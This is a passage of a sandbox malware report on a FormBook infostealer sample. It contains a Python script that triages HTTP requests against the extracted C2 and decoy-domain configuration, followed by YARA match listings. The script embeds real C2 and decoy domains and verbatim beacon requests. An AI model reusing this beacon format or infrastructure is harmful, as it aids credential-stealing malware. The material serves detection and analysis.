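The extracted configuration lists one C2 URL and 64 decoy domains, and the traffic above shows the bot contacting two of the decoys (www.111lll.xyz, www.73129.vip) with the same /sk19/ path as the configured C2, no User-Agent header, and a seven-null-byte body on a GET. The following Python is an added example, not part of the Joe Sandbox report, that turns those observations into a triage check: it loads the extracted config, parses raw HTTP requests, labels the host as c2 / decoy / unknown, and scores the request shape. The sample requests are constructed from the report's traffic lines; the fourth one, aimed at the configured C2 host, was not observed in the sandbox and is there only to exercise the lookup. The shape heuristics (two query parameters, a long base64-alphabet first value, no User-Agent, null-byte body, 40-character threshold) are my generalisation from the two captured requests, not a published FormBook protocol description.

```python
"""Triage HTTP requests against the FormBook configuration extracted in this report."""
import re
from urllib.parse import urlsplit

# Configuration exactly as the sandbox extractor reported it (AV Detection section).
FORMBOOK_CONFIG = {
    "C2 list": ["www.justbeand.com/sk19/"],
    "decoy": (
        "21diasdegratitud.com kx1993.com chasergt.com 837news.com "
        "naturagent.co.uk gatorinsurtech.com iyaboolashilesblog.africa jamtanganmurah.online "
        "gguminsa.com lilliesdrop.com lenvera.com link48.co.uk "
        "azinos777.fun lgcdct.cfd bg-gobtc.com livecarrer.uk "
        "cbq4u.com imalreadygone.com wabeng.africa jxmheiyouyuetot.tokyo "
        "atrikvde.xyz ceopxb.com autovincert.com 18traversplace.com "
        "internetmedianews.com entersight.net guzmanshandymanservicesllc.com gqqwdz.com "
        "emeraldpathjewelery.com flowmoneycode.online gaziantepmedicalpointanket.com 111lll.xyz "
        "irkwood138.site abovegross.com shopabeee.co.uk greenvalleyfoodusa.com "
        "dd-canada.com libertysminings.com baronsaccommodation.co.uk kareto.buzz "
        "freeexercisecoalition.com 73129.vip avanteventexperiences.com comercialdiabens.fun "
        "nondescript.uk facal.dev detox-71934.com kovar.club "
        "jetsparking.com infocuspublicidad.com xxhcom.com indianvoltage.com "
        "becrownedllc.com 3744palosverdes.com gospelnative.africa linkmastermind.com "
        "cotgfp.com lousweigman.com cantoaffine.online debbiepatrickdesigns.com "
        "766626.com webcubemedia.africa autonomaat.com hannahmarsh.co.uk"
    ).split(),
}

NUL7 = "\x00" * 7  # the "Data Raw: 00 00 00 00 00 00 00" body the sandbox captured

# Constructed raw requests: [0] and [1] rebuild the two GETs recorded above, [2] is a
# benign control, [3] reuses [0]'s query against the configured C2 host (not observed).
SAMPLE_REQUESTS = [
    "GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP"
    "&u4=pVhTtd7pjTy HTTP/1.1\r\nHost: www.111lll.xyz\r\nConnection: close\r\n\r\n" + NUL7,
    "GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm"
    "&u4=pVhTtd7pjTy HTTP/1.1\r\nHost: www.73129.vip\r\nConnection: close\r\n\r\n" + NUL7,
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
    "GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP"
    "&u4=pVhTtd7pjTy HTTP/1.1\r\nHost: www.justbeand.com\r\nConnection: close\r\n\r\n" + NUL7,
]

# ASSUMED threshold: the two captured first-parameter values are 67 and 68 characters.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _bare_host(host):
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def _c2_table(config):
    """bare C2 hostname -> configured path, e.g. {'justbeand.com': '/sk19/'}."""
    table = {}
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        table[_bare_host(host)] = "/" + path
    return table


def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    # Split the query by hand: parse_qsl() would turn '+' into a space and percent-decode,
    # which mangles the base64 token we want to inspect.
    params = []
    for pair in parts.query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((key, value))
    return method, headers, parts.path, params, body


def triage_request(raw, config=FORMBOOK_CONFIG):
    method, headers, path, params, body = parse_request(raw)
    c2 = _c2_table(config)
    bare = _bare_host(headers.get("host", ""))
    role = "c2" if bare in c2 else "decoy" if bare in config["decoy"] else "unknown"
    indicators = {
        "path_match": path in set(c2.values()),
        "two_param_query": len(params) == 2,
        "long_b64_value": bool(params) and B64_TOKEN.fullmatch(params[0][1]) is not None,
        "no_user_agent": "user-agent" not in headers,
        "null_body": body != "" and set(body) == {"\x00"},
    }
    if method == "GET" and all(indicators.values()):
        verdict = "formbook_beacon"
    elif role != "unknown" or indicators["path_match"]:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"host": headers.get("host", ""), "role": role, "path": path,
            "verdict": verdict, **indicators}


def triage_all(requests, config=FORMBOOK_CONFIG):
    return [triage_request(r, config) for r in requests]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_REQUESTS):
        print(f"{r['verdict']:16} {r['role']:8} {r['host']:22} {r['path']}")
```

The role label is deliberately kept separate from the verdict: the extractor's split of one "C2" entry versus 64 "decoy" domains is the extractor's interpretation of the config, while the request shape is what the wire actually shows, so a proxy log hit on a decoy domain with a matching shape is still a FormBook beacon from an infected host.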

E-Banking Fraud

Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00406333 0_2_00406333
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00404936 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF33B7 1_2_00EF33B7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00ED9C80 1_2_00ED9C80
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF23F5 1_2_00EF23F5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F58400 1_2_00F58400
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F06502 1_2_00F06502
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EDE6F0 1_2_00EDE6F0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F0265E 1_2_00F0265E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF282A 1_2_00EF282A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F089BF 1_2_00F089BF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F06A74 1_2_00F06A74
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F50A3A 1_2_00F50A3A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE0BE0 1_2_00EE0BE0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F2EDB2 1_2_00F2EDB2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFCD51 1_2_00EFCD51
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F50EB7 1_2_00F50EB7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F38E44 1_2_00F38E44
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F06FE6 1_2_00F06FE6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EDB020 1_2_00EDB020
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00ED94E0 1_2_00ED94E0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EED45D 1_2_00EED45D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFF409 1_2_00EFF409
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EDF6A0 1_2_00EDF6A0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF16B4 1_2_00EF16B4
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00ED1663 1_2_00ED1663
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EEF628 1_2_00EEF628
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF78C3 1_2_00EF78C3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF1BA8 1_2_00EF1BA8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFDBA5 1_2_00EFDBA5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F09CE5 1_2_00F09CE5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EEDD28 1_2_00EEDD28
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF1FC0 1_2_00EF1FC0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFBFD6 1_2_00EFBFD6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF0227 1_2_03AF0227
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF04D8 1_2_03AF04D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041E81B 2_2_0041E81B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041DA1E 2_2_0041DA1E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00402D87 2_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D5A6 2_2_0041D5A6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00409E60 2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041EF6B 2_2_0041EF6B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041DFC2 2_2_0041DFC2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041E798 2_2_0041E798
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EDB020 2_2_00EDB020
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EFDBA5 2_2_00EFDBA5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00ED94E0 2_2_00ED94E0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00ED9C80 2_2_00ED9C80
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EED45D 2_2_00EED45D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00F58400 2_2_00F58400
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EFCD51 2_2_00EFCD51
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EEDD28 2_2_00EEDD28
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00F06502 2_2_00F06502
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EF16B4 2_2_00EF16B4
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00ED1663 2_2_00ED1663
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EEF628 2_2_00EEF628
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00F06FE6 2_2_00F06FE6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EFBFD6 2_2_00EFBFD6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F28F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 1_2_00F28F2E
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\kmhbvf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: shedfam.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
